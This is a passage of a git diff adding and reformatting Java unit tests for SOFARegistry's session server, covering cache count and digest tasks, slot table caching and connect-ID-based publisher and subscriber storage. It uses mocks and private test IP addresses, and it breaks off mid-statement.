the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.scheduler.timertask; + +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.Subscriber; +import com.alipay.sofa.registry.common.model.store.Watcher; +import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.node.processor.ClientNodeSingleTaskProcessor; +import com.alipay.sofa.registry.server.session.store.DataStore; +import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.server.session.store.Watchers; +import com.alipay.sofa.registry.task.batcher.TaskDispatchers; +import com.google.common.collect.Lists; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class CacheTaskTest { + private String app = "app"; + private String group = "group"; + private String instanceId = "instanceId"; + private String dataInfoId = "dataInfoId"; + + private Watchers watchers; + private Interests interests; + private DataStore dataStore; + + private void init() { + this.watchers = Mockito.mock(Watchers.class); + Watcher watcher = new Watcher(); + watcher.setAppName(app); + watcher.setGroup(group); + watcher.setInstanceId(instanceId); + watcher.setDataInfoId(dataInfoId); + Mockito.when(watchers.count()).thenReturn(1L); + Mockito.when(watchers.getDataList()).thenReturn(Lists.newArrayList(watcher)); + + this.interests = Mockito.mock(Interests.class); + Subscriber subscriber = new Subscriber(); + subscriber.setAppName(app); + subscriber.setGroup(group); + subscriber.setInstanceId(instanceId); + subscriber.setDataInfoId(dataInfoId); + Mockito.when(interests.count()).thenReturn(2L); + Mockito.when(interests.getDataList()).thenReturn(Lists.newArrayList(subscriber)); + Mockito.when(interests.getDataInfoIds()).thenReturn(Lists.newArrayList(dataInfoId)); + Mockito.when(interests.getDatas(Mockito.anyString())) + .thenReturn(Lists.newArrayList(subscriber)); + + this.dataStore = Mockito.mock(DataStore.class); + Publisher publisher = new Publisher(); + publisher.setAppName(app); + publisher.setGroup(group); + publisher.setInstanceId(instanceId); + publisher.setDataInfoId(dataInfoId); + Mockito.when(dataStore.count()).thenReturn(3L); + Mockito.when(dataStore.getDataList()).thenReturn(Lists.newArrayList(publisher)); + Mockito.when(dataStore.getDataInfoIds()).thenReturn(Lists.newArrayList(dataInfoId)); + Mockito.when(dataStore.getDatas(Mockito.anyString())).thenReturn(Lists.newArrayList(publisher)); + } + + @Test + public void testCount() { + init(); + CacheCountTask task = new CacheCountTask(); + SessionServerConfigBean serverConfigBean = TestUtils.newSessionConfig("testDc"); + task.sessionServerConfig = serverConfigBean; + + // npe + Assert.assertFalse(task.syncCount()); + task.sessionWatchers = watchers; + task.sessionDataStore = dataStore; + task.sessionInterests = interests; + + serverConfigBean.setCacheCountIntervalSecs(0); + Assert.assertFalse(task.init()); + // has item + serverConfigBean.setCacheCountIntervalSecs(1); + Assert.assertTrue(task.syncCount()); + Assert.assertTrue(task.init()); + } + + @Test + public void testDigest() { + init(); + SessionCacheDigestTask task = new SessionCacheDigestTask(); + SessionServerConfigBean serverConfigBean = TestUtils.newSessionConfig("testDc"); + task.sessionServerConfig = serverConfigBean; + + // npe + Assert.assertFalse(task.dump()); + task.sessionDataStore = dataStore; + task.sessionInterests = interests; + + serverConfigBean.setCacheDigestIntervalMinutes(0); + Assert.assertFalse(task.init()); + // has item + serverConfigBean.setCacheDigestIntervalMinutes(1); + Assert.assertTrue(task.dump()); + Assert.assertTrue(task.init()); + } + + @Test + public void testClient() { + init(); + SyncClientsHeartbeatTask task = new SyncClientsHeartbeatTask(); + SessionServerConfigBean serverConfigBean = TestUtils.newSessionConfig("testDc"); + task.sessionServerConfig = serverConfigBean; + task.sessionDataStore = dataStore; + task.sessionInterests = interests; + task.sessionWatchers = watchers; + + BoltExchange boltExchange = Mockito.mock(BoltExchange.class); + task.boltExchange = boltExchange; + task.executorManager = new ExecutorManager(serverConfigBean); + TaskDispatchers.createDefaultSingleTaskDispatcher("test", new ClientNodeSingleTaskProcessor()); + try { + task.syncCount(); + task.printTaskExecute(); + task.printExecutorTaskExecute(); + } finally { + TaskDispatchers.getTaskDispatcherMap().clear(); + } + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/slot/SlotTableCacheImplTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/slot/SlotTableCacheImplTest.java new file mode 100644 index 000000000..ac8b2998f --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/slot/SlotTableCacheImplTest.java @@ -0,0 +1,171 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.slot; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.slot.func.SlotFunctionRegistry; +import com.alipay.sofa.registry.server.session.AbstractSessionServerTestBase; +import com.alipay.sofa.registry.server.shared.slot.SlotTableRecorder; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Sets; +import java.util.List; +import java.util.Set; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicReference; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class SlotTableCacheImplTest extends AbstractSessionServerTestBase { + + private SlotTableCacheImpl slotTableCache = new SlotTableCacheImpl(); + + @Test + public void testSlotOf() { + String dataInfoId = randomString(); + int slotId = slotTableCache.slotOf(dataInfoId); + Assert.assertEquals(SlotFunctionRegistry.getFunc().slotOf(dataInfoId), slotId); + AtomicBoolean concurrentResult = new AtomicBoolean(true); + new ConcurrentExecutor(10, executors) + .execute( + new Runnable() { + @Override + public void run() { + String dataInfoId = randomString(); + if (SlotFunctionRegistry.getFunc().slotOf(dataInfoId) + != slotTableCache.slotOf(dataInfoId)) { + concurrentResult.set(false); + } + } + }); + Assert.assertTrue(concurrentResult.get()); + } + + @Test + public void testGetInfo() { + slotTableCache.updateSlotTable(randomSlotTable()); + String dataInfoId = randomString(); + Assert.assertEquals( + slotTableCache.getSlot(SlotFunctionRegistry.getFunc().slotOf(dataInfoId)), + slotTableCache.getSlot(dataInfoId)); + Assert.assertSame( + slotTableCache.getSlot(SlotFunctionRegistry.getFunc().slotOf(dataInfoId)), + slotTableCache.getSlot(dataInfoId)); + Assert.assertNull(slotTableCache.getLeader(13685)); + Assert.assertNotNull(slotTableCache.getLeader(3)); + } + + @Test + public void testRecorders() throws InterruptedException { + SlotTable slotTable = randomSlotTable(); + AtomicReference ref = new AtomicReference<>(); + slotTableCache.setRecorders( + Lists.newArrayList( + new SlotTableRecorder() { + @Override + public void record(SlotTable slotTable) { + ref.set(slotTable); + } + })); + CountDownLatch latch = new CountDownLatch(1); + executors.execute( + new Runnable() { + @Override + public void run() { + slotTableCache.updateSlotTable(slotTable); + latch.countDown(); + } + }); + latch.await(); + Assert.assertNotNull(ref.get()); + Assert.assertEquals(slotTable, ref.get()); + } + + @Test + public void testUpdateSlotTable() { + Set epoches = Sets.newConcurrentHashSet(); + AtomicBoolean result = new AtomicBoolean(true); + ConsumerProducer.builder() + .consumerNum(10) + .consumer( + new Runnable() { + @Override + public void run() { + try { + epoches.add(slotTableCache.getEpoch()); + } catch (Throwable th) { + result.set(false); + } + } + }) + .producerNum(1) + .producer( + new Runnable() { + @Override + public void run() { + try { + slotTableCache.updateSlotTable(randomSlotTable()); + } catch (Throwable th) { + result.set(false); + } + } + }) + .executor(executors) + .build() + .execute(null); + Assert.assertTrue(result.get()); + Assert.assertTrue(epoches.size() > 0); + } + + @Test + public void testCurrentSlotTable() throws InterruptedException { + slotTableCache.updateSlotTable(randomSlotTable()); + Assert.assertNotSame( + slotTableCache.getCurrentSlotTable(), slotTableCache.getCurrentSlotTable()); + Assert.assertEquals(slotTableCache.getCurrentSlotTable(), slotTableCache.getCurrentSlotTable()); + SlotTable prev = slotTableCache.getCurrentSlotTable(); + CountDownLatch latch = new CountDownLatch(1); + executors.execute( + new Runnable() { + @Override + public void run() { + slotTableCache.updateSlotTable(randomSlotTable()); + latch.countDown(); + } + }); + latch.await(); + Assert.assertNotEquals(prev, slotTableCache.getCurrentSlotTable()); + } + + @Test + public void testWillNotUpdateLowerEpoch() { + slotTableCache.updateSlotTable(randomSlotTable()); + slotTableCache.updateSlotTable(new SlotTable(123, randomSlotTable().getSlots())); + Assert.assertNotEquals(123, slotTableCache.getCurrentSlotTable().getEpoch()); + } + + @Test + public void testBlankSlot() { + SlotTable correct = randomSlotTable(); + List incorrect = correct.getSlots(); + incorrect.add(new Slot(13684, "", DatumVersionUtil.nextId(), Lists.newArrayList())); + SlotTable slotTable = new SlotTable(correct.getEpoch(), incorrect); + slotTableCache.updateSlotTable(slotTable); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/BaseTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/BaseTest.java index e77a07aae..ecd93a1c5 100644 --- a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/BaseTest.java +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/BaseTest.java @@ -19,10 +19,8 @@ import org.springframework.boot.SpringBootConfiguration; /** - * * @author shangyu.wh * @version $Id: BaseTest.java, v 0.1 2017-12-14 21:47 shangyu.wh Exp $ */ @SpringBootConfiguration -public class BaseTest { -} \ No newline at end of file +public class BaseTest {} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/DataCacheTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/DataCacheTest.java index 8ca0f69d0..4fbe55145 100644 --- a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/DataCacheTest.java +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/store/DataCacheTest.java @@ -16,244 +16,508 @@ */ package com.alipay.sofa.registry.server.session.store; +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.SubscriberUtils; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.store.*; import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.Publisher; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.server.session.bootstrap.CommonConfig; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; -import com.alipay.sofa.registry.server.session.cache.CacheGenerator; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.cache.SessionCacheService; -import org.junit.Assert; -import org.junit.Test; - +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; import java.net.InetSocketAddress; -import java.util.HashMap; +import java.util.Collection; +import java.util.List; import java.util.Map; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; import java.util.concurrent.atomic.AtomicLong; +import org.junit.Assert; +import org.junit.Test; /** - * * @author shangyu.wh * @version $Id: DataCacheTest.java, v 0.1 2017-12-06 19:42 shangyu.wh Exp $ */ - public class DataCacheTest extends BaseTest { - private AtomicLong version = new AtomicLong(1); - - private AtomicLong registId = new AtomicLong(1000); - - @Test - public void testGetSub() { - SessionInterests sessionInterests = new SessionInterests(); - sessionInterests.setSessionServerConfig(new SessionServerConfigBean(null)); - - String dataId = "dataid"; - String connectId = "192.168.1.2:9000"; + private AtomicLong version = new AtomicLong(1); - for (int i = 0; i < 100; i++) { - sessionInterests.add(getSub(dataId, ScopeEnum.zone, null, null)); - } - //add other ip - sessionInterests.add(getSub(dataId, ScopeEnum.zone, null, new URL("192.168.1.9", 8000))); + private AtomicLong registId = new AtomicLong(1000); - Map> map = getCacheSub( - DataInfo.toDataInfoId(dataId, "instance2", "rpc"), ScopeEnum.zone, sessionInterests); - Assert.assertTrue(getCacheSub(sessionInterests, connectId)); - - sessionInterests.deleteByConnectId(connectId); - - Map> map2 = getCacheSub( - DataInfo.toDataInfoId(dataId, "instance2", "rpc"), ScopeEnum.zone, sessionInterests); - - Assert.assertFalse(getCacheSub(sessionInterests, connectId)); + @Test + public void testGetSub() { + SessionInterests sessionInterests = new SessionInterests(); + sessionInterests.setSessionServerConfig(new SessionServerConfigBean(null)); - //map no change - Assert.assertEquals(2, map.size()); + String dataId = "dataid"; + String connectId = "192.168.1.2:9000_127.0.0.1:34567"; - //get cache change,just remain 192.168.1.9:8000 - Assert.assertEquals(map2.keySet().size(), 1); - Assert.assertEquals(NetUtil.toAddressString(map2.keySet().iterator().next()), - "192.168.1.9:8000"); + for (int i = 0; i < 100; i++) { + sessionInterests.add(getSub(dataId, ScopeEnum.zone, null, null)); } + // add other ip + sessionInterests.add(getSub(dataId, ScopeEnum.zone, null, new URL("192.168.1.9", 8000))); - @Test - public void testDeleteSubById() { - SessionInterests sessionInterests = new SessionInterests(); - sessionInterests.setSessionServerConfig(new SessionServerConfigBean(null)); - - String dataId = "dataid"; - - for (int i = 0; i < 100; i++) { - - sessionInterests.add(getSub(dataId, ScopeEnum.zone, null, null)); - } - //add other ip - sessionInterests.add(getSub(dataId, ScopeEnum.zone, "xxregist123", new URL("192.168.1.9", - 8000))); - //sessionInterests.add(getSub(dataId,ScopeEnum.zone,"xxregist456",new URL("192.168.1.10", 7000))); - - Map> map = getCacheSub( + Map> map = + getCacheSub( DataInfo.toDataInfoId(dataId, "instance2", "rpc"), ScopeEnum.zone, sessionInterests); - Assert.assertTrue(getCacheSub(sessionInterests, "192.168.1.9:8000")); + Assert.assertTrue(getCacheSub(sessionInterests, connectId)); - sessionInterests.deleteById("xxregist123", - DataInfo.toDataInfoId(dataId, "instance2", "rpc")); + sessionInterests.deleteByConnectId(ConnectId.parse(connectId)); - Map> map2 = getCacheSub( + Map> map2 = + getCacheSub( DataInfo.toDataInfoId(dataId, "instance2", "rpc"), ScopeEnum.zone, sessionInterests); - Assert.assertFalse(getCacheSub(sessionInterests, "192.168.1.9:8000")); - //map no change - Assert.assertEquals(2, map.size()); + Assert.assertFalse(getCacheSub(sessionInterests, connectId)); - //remain 100 - Assert.assertEquals(map2.keySet().size(), 2); + // map no change + Assert.assertEquals(2, map.size()); - InetSocketAddress address = new InetSocketAddress("192.168.1.2", 9000); - InetSocketAddress addressDel = new InetSocketAddress("192.168.1.9", 8000); - Assert.assertFalse(map2.get(address).isEmpty()); + // get cache change,just remain 192.168.1.9:8000 + Assert.assertEquals(map2.keySet().size(), 1); + Assert.assertEquals( + NetUtil.toAddressString(map2.keySet().iterator().next()), "192.168.1.9:8000"); + } - Assert.assertFalse(!map2.get(addressDel).isEmpty()); + @Test + public void testDeleteSubById() { + SessionInterests sessionInterests = new SessionInterests(); + sessionInterests.setSessionServerConfig(new SessionServerConfigBean(null)); - //Assert.assertEquals(NetUtil.toAddressString(map2.keySet().iterator().next()),"192.168.1.2:9000"); - Assert.assertEquals(map2.get(address).size(), 100); - } + String dataId = "dataid"; - @Test - public void testGetPub() { - SessionDataStore sessionDataStore = new SessionDataStore(); - CacheService cacheService = new SessionCacheService(); + for (int i = 0; i < 100; i++) { - Map cacheGenerators = new HashMap<>(); - ((SessionCacheService) cacheService).setCacheGenerators(cacheGenerators); - - String dataId = "dataid"; - String connectId = "192.168.1.2:9000"; - for (int i = 0; i < 10; i++) { - - sessionDataStore.add(getPub(dataId, null, null)); - } - - Assert.assertTrue(getCachePub(sessionDataStore, connectId)); - sessionDataStore.deleteByConnectId(connectId); - Assert.assertFalse(getCachePub(sessionDataStore, connectId)); + sessionInterests.add(getSub(dataId, ScopeEnum.zone, null, null)); } + // add other ip + sessionInterests.add( + getSub(dataId, ScopeEnum.zone, "xxregist123", new URL("192.168.1.9", 8000))); + // sessionInterests.add(getSub(dataId,ScopeEnum.zone,"xxregist456",new URL("192.168.1.10", + // 7000))); + + Map> map = + getCacheSub( + DataInfo.toDataInfoId(dataId, "instance2", "rpc"), ScopeEnum.zone, sessionInterests); + Assert.assertTrue(getCacheSub(sessionInterests, "192.168.1.9:8000_127.0.0.1:34567")); - @Test - public void testGetPubRefresh() { - SessionDataStore sessionDataStore = new SessionDataStore(); - CacheService cacheService = new SessionCacheService(); - - Map cacheGenerators = new HashMap<>(); - ((SessionCacheService) cacheService).setCacheGenerators(cacheGenerators); + sessionInterests.deleteById("xxregist123", DataInfo.toDataInfoId(dataId, "instance2", "rpc")); - String dataId = "dataid"; - String connectId = "192.168.1.2:9000"; - int number = 1000; - ExecutorService executorService = Executors.newFixedThreadPool(number); + Map> map2 = + getCacheSub( + DataInfo.toDataInfoId(dataId, "instance2", "rpc"), ScopeEnum.zone, sessionInterests); - for (int i = 0; i < number; i++) { - String connectIdss = "192.111.0.1:" + (8000 + i); - executorService.submit(() -> { - sessionDataStore.add(getPub(dataId, null, URL.valueOf(connectIdss))); - Assert.assertTrue(getCachePub(sessionDataStore, connectIdss)); - }); - } + Assert.assertFalse(getCacheSub(sessionInterests, "192.168.1.9:8000_127.0.0.1:34567")); + // map no change + Assert.assertEquals(2, map.size()); - Assert.assertFalse(getCachePub(sessionDataStore, connectId)); - } + // remain 100 + Assert.assertEquals(map2.keySet().size(), 1); - @Test - public void testDelPubById() { - SessionDataStore sessionDataStore = new SessionDataStore(); - CacheService cacheService = new SessionCacheService(); + InetSocketAddress address = new InetSocketAddress("192.168.1.2", 9000); + InetSocketAddress addressDel = new InetSocketAddress("192.168.1.9", 8000); + Assert.assertFalse(map2.get(address).isEmpty()); - Map cacheGenerators = new HashMap<>(); - ((SessionCacheService) cacheService).setCacheGenerators(cacheGenerators); + Assert.assertTrue(map2.get(addressDel) == null); - String dataId = "dataid"; - String connectId = "192.168.1.2:9000"; - for (int i = 0; i < 10; i++) { + // Assert.assertEquals(NetUtil.toAddressString(map2.keySet().iterator().next()),"192.168.1.2:9000"); + Assert.assertEquals(map2.get(address).size(), 100); + } - sessionDataStore.add(getPub(dataId, null, null)); - } + @Test + public void testGetPub() { + SessionDataStore sessionDataStore = new SessionDataStore(); - sessionDataStore.add(getPub(dataId, "XXXX", new URL("192.168.1.9", 8000))); + String dataId = "dataid"; + String connectId = "192.168.1.2:9000_127.0.0.1:34567"; + for (int i = 0; i < 10; i++) { - Assert.assertTrue(getCachePub(sessionDataStore, connectId)); - Assert.assertTrue(getCachePub(sessionDataStore, "192.168.1.9:8000")); - sessionDataStore.deleteById("XXXX", DataInfo.toDataInfoId(dataId, "instance2", "rpc")); - Assert.assertTrue(getCachePub(sessionDataStore, connectId)); - Assert.assertFalse(getCachePub(sessionDataStore, "192.168.1.9:8000")); + sessionDataStore.add(getPub(dataId, null, null)); } - private boolean getCachePub(SessionDataStore sessionDataStore, String connectId) { - Map map = sessionDataStore.queryByConnectId(connectId); - return map != null && !map.isEmpty(); + Assert.assertTrue(getCachePub(sessionDataStore, connectId)); + sessionDataStore.deleteByConnectId(ConnectId.parse(connectId)); + Assert.assertFalse(getCachePub(sessionDataStore, connectId)); + } + + @Test + public void testGetPubRefresh() { + SessionDataStore sessionDataStore = new SessionDataStore(); + + String dataId = "dataid"; + String connectId = "192.168.1.2:9000"; + int number = 1000; + List publisherList = Lists.newArrayList(); + for (int i = 0; i < number; i++) { + String connectIdss = "192.111.0.1:" + (8000 + i); + Publisher p = getPub(dataId, null, URL.valueOf(connectIdss)); + sessionDataStore.add(p); + publisherList.add(p); + Assert.assertTrue( + getCachePub( + sessionDataStore, + connectIdss + + ValueConstants.CONNECT_ID_SPLIT + + p.getTargetAddress().buildAddressString())); } - - private boolean getCacheSub(SessionInterests sessionInterests, String connectId) { - Map map = sessionInterests.queryByConnectId(connectId); - return map != null && !map.isEmpty(); + for (Publisher p : publisherList) { + String c = + connectId + ValueConstants.CONNECT_ID_SPLIT + p.getTargetAddress().buildAddressString(); + Assert.assertFalse(getCachePub(sessionDataStore, c)); } + } - private Map> getCacheSub(String dataInfoId, - ScopeEnum scopeEnum, - SessionInterests sessionInterests) { + @Test + public void testDelPubById() { + SessionDataStore sessionDataStore = new SessionDataStore(); + String dataId = "dataid"; + String connectId = "192.168.1.2:9000_127.0.0.1:34567"; + for (int i = 0; i < 10; i++) { - return sessionInterests.querySubscriberIndex(dataInfoId, scopeEnum); + sessionDataStore.add(getPub(dataId, null, null)); } - private Subscriber getSub(String dataId, ScopeEnum scopeEnum, String registerId, URL url) { - - String processid = "4466"; - - Subscriber subscriberRegister = new Subscriber(); - subscriberRegister.setAppName("app"); - subscriberRegister.setCell("My zone"); - subscriberRegister.setClientId("clientid" + version.get()); - subscriberRegister.setDataId(dataId); - subscriberRegister.setGroup("rpc"); - subscriberRegister.setInstanceId("instance2"); - subscriberRegister.setRegisterId(registerId == null ? String.valueOf(registId - .incrementAndGet()) : registerId); - subscriberRegister.setProcessId(processid); - subscriberRegister.setVersion(version.get()); - subscriberRegister.setRegisterTimestamp(System.currentTimeMillis()); - subscriberRegister.setScope(scopeEnum); - subscriberRegister.setDataInfoId(DataInfo.toDataInfoId(dataId, "instance2", "rpc")); - - subscriberRegister.setSourceAddress(url == null ? new URL("192.168.1.2", 9000) : url); - - return subscriberRegister; - } - - private Publisher getPub(String dataId, String registerId, URL url) { - - String processid = "4466"; - - Publisher publisher = new Publisher(); - publisher.setAppName("app"); - publisher.setCell("My zone"); - publisher.setClientId("clientid" + version.get()); - publisher.setDataId(dataId); - publisher.setGroup("rpc"); - publisher.setInstanceId("instance2"); - publisher.setRegisterId(registerId == null ? String.valueOf(registId.incrementAndGet()) - : registerId); - publisher.setProcessId(processid); - publisher.setVersion(version.get()); - publisher.setRegisterTimestamp(System.currentTimeMillis()); - publisher.setDataInfoId(DataInfo.toDataInfoId(dataId, "instance2", "rpc")); - - publisher.setSourceAddress(url == null ? new URL("192.168.1.2", 9000) : url); - - return publisher; - } -} \ No newline at end of file + sessionDataStore.add(getPub(dataId, "XXXX", new URL("192.168.1.9", 8000))); + + Assert.assertTrue(getCachePub(sessionDataStore, connectId)); + Assert.assertTrue(getCachePub(sessionDataStore, "192.168.1.9:8000_127.0.0.1:34567")); + sessionDataStore.deleteById("XXXX", DataInfo.toDataInfoId(dataId, "instance2", "rpc")); + Assert.assertTrue(getCachePub(sessionDataStore, connectId)); + Assert.assertFalse(getCachePub(sessionDataStore, "192.168.1.9:8000_127.0.0.1:34567")); + } + + private boolean getCachePub(SessionDataStore sessionDataStore, String connectId) { + Map map = sessionDataStore.queryByConnectId(ConnectId.parse(connectId)); + return map != null && !map.isEmpty(); + } + + private boolean getCacheSub(SessionInterests sessionInterests, String connectId) { + Map map = sessionInterests.queryByConnectId(ConnectId.parse(connectId)); + return map != null && !map.isEmpty(); + } + + private Map> getCacheSub( + String dataInfoId, ScopeEnum scopeEnum, SessionInterests sessionInterests) { + Collection subscribers = sessionInterests.getDatas(dataInfoId); + Map> ret = Maps.newHashMap(); + Map> scopes = SubscriberUtils.groupByScope(subscribers); + List list = scopes.get(scopeEnum); + ret.putAll(SubscriberUtils.groupBySourceAddress(list)); + return ret; + } + + private Subscriber getSub(String dataId, ScopeEnum scopeEnum, String registerId, URL url) { + + String processid = "4466"; + + Subscriber subscriberRegister = new Subscriber(); + subscriberRegister.setAppName("app"); + subscriberRegister.setCell("My zone"); + subscriberRegister.setClientId("clientid" + version.get()); + subscriberRegister.setDataId(dataId); + subscriberRegister.setGroup("rpc"); + subscriberRegister.setInstanceId("instance2"); + subscriberRegister.setRegisterId( + registerId == null ? String.valueOf(registId.incrementAndGet()) : registerId); + subscriberRegister.setProcessId(processid); + subscriberRegister.setVersion(version.get()); + subscriberRegister.setRegisterTimestamp(System.currentTimeMillis()); + subscriberRegister.setScope(scopeEnum); + subscriberRegister.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriberRegister.setDataInfoId(DataInfo.toDataInfoId(dataId, "instance2", "rpc")); + + subscriberRegister.setSourceAddress(url == null ? new URL("192.168.1.2", 9000) : url); + subscriberRegister.setTargetAddress(new URL("127.0.0.1", 34567)); + + return subscriberRegister; + } + + private Publisher getPub(String dataId, String registerId, URL url) { + + String processid = "4466"; + + Publisher publisher = new Publisher(); + publisher.setAppName("app"); + publisher.setCell("My zone"); + publisher.setClientId("clientid" + version.get()); + publisher.setDataId(dataId); + publisher.setGroup("rpc"); + publisher.setInstanceId("instance2"); + publisher.setRegisterId( + registerId == null ? String.valueOf(registId.incrementAndGet()) : registerId); + publisher.setProcessId(processid); + publisher.setVersion(version.get()); + publisher.setRegisterTimestamp(System.currentTimeMillis()); + publisher.setDataInfoId(DataInfo.toDataInfoId(dataId, "instance2", "rpc")); + + publisher.setSourceAddress(url == null ? new URL("192.168.1.2", 9000) : url); + publisher.setTargetAddress(new URL("127.0.0.1", 34567)); + + return publisher; + } + + @Test + public void testOverwriteSameConnectIdPublisher() { + + SessionDataStore sessionDataStore = new SessionDataStore(); + + Publisher publisher1 = new Publisher(); + publisher1.setDataInfoId("dataInfoId1"); + publisher1.setDataId("dataId1"); + publisher1.setRegisterId("RegisterId1"); + publisher1.setSourceAddress(new URL("192.168.1.1", 12345)); + publisher1.setTargetAddress(new URL("192.168.1.2", 9600)); + publisher1.setVersion(1L); + publisher1.setRegisterTimestamp(System.currentTimeMillis()); + + Publisher publisher2 = new Publisher(); + publisher2.setDataInfoId("dataInfoId2"); + publisher2.setDataId("dataId2"); + publisher2.setRegisterId("RegisterId2"); + publisher2.setSourceAddress(new URL("192.168.1.1", 12345)); + publisher2.setTargetAddress(new URL("192.168.1.2", 9600)); + publisher2.setVersion(2L); + publisher2.setRegisterTimestamp(System.currentTimeMillis()); + sessionDataStore.add(publisher1); + sessionDataStore.add(publisher2); + + Assert.assertEquals( + sessionDataStore + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 2); + sessionDataStore.add(publisher2); + + Assert.assertEquals( + sessionDataStore + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 2); + + Publisher publisher3 = new Publisher(); + publisher3.setDataInfoId(publisher1.getDataInfoId()); + publisher3.setDataId(publisher1.getDataId()); + publisher3.setRegisterId(publisher1.getRegisterId()); + publisher3.setSourceAddress(new URL("192.168.1.1", 12346)); + publisher3.setTargetAddress(new URL("192.168.1.2", 9600)); + publisher3.setVersion(2L); + publisher3.setRegisterTimestamp(System.currentTimeMillis()); + + Publisher publisher4 = new Publisher(); + publisher4.setDataInfoId(publisher2.getDataInfoId()); + publisher4.setDataId(publisher2.getDataId()); + publisher4.setRegisterId(publisher2.getRegisterId()); + publisher4.setSourceAddress(new URL("192.168.1.1", 12346)); + publisher4.setTargetAddress(new URL("192.168.1.2", 9600)); + publisher4.setVersion(2L); + publisher4.setRegisterTimestamp(System.currentTimeMillis()); + + sessionDataStore.add(publisher3); + sessionDataStore.add(publisher4); + + Assert.assertEquals( + sessionDataStore + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 0); + Assert.assertEquals( + sessionDataStore + .queryByConnectId(ConnectId.parse("192.168.1.1:12346_192.168.1.2:9600")) + .size(), + 2); + } + + @Test + public void testOverwriteSameConnectIdSubscriber() { + + SessionInterests sessionInterests = new SessionInterests(); + SessionServerConfig config = new SessionServerConfigBean(new CommonConfig()); + config.setStopPushSwitch(false); + sessionInterests.setSessionServerConfig(config); + + Subscriber subscriber1 = new Subscriber(); + subscriber1.setScope(ScopeEnum.dataCenter); + subscriber1.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriber1.setDataInfoId("dataInfoId1"); + subscriber1.setDataId("dataId1"); + subscriber1.setRegisterId("RegisterId1"); + subscriber1.setSourceAddress(new URL("192.168.1.1", 12345)); + subscriber1.setTargetAddress(new URL("192.168.1.2", 9600)); + + Subscriber subscriber2 = new Subscriber(); + subscriber2.setScope(ScopeEnum.dataCenter); + subscriber2.setClientVersion(BaseInfo.ClientVersion.StoreData); + subscriber2.setDataInfoId("dataInfoId2"); + subscriber2.setDataId("dataId2"); + subscriber2.setRegisterId("RegisterId2"); + subscriber2.setSourceAddress(new URL("192.168.1.1", 12345)); + subscriber2.setTargetAddress(new URL("192.168.1.2", 9600)); + + sessionInterests.add(subscriber1); + sessionInterests.add(subscriber2); + + Assert.assertEquals( + sessionInterests + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 2); + sessionInterests.add(subscriber2); + + Assert.assertEquals( + sessionInterests + .queryByConnectId(ConnectId.parse("192.168.1.1:12345_192.168.1.2:9600")) + .size(), + 2); + + Subscriber subscriber3 = new 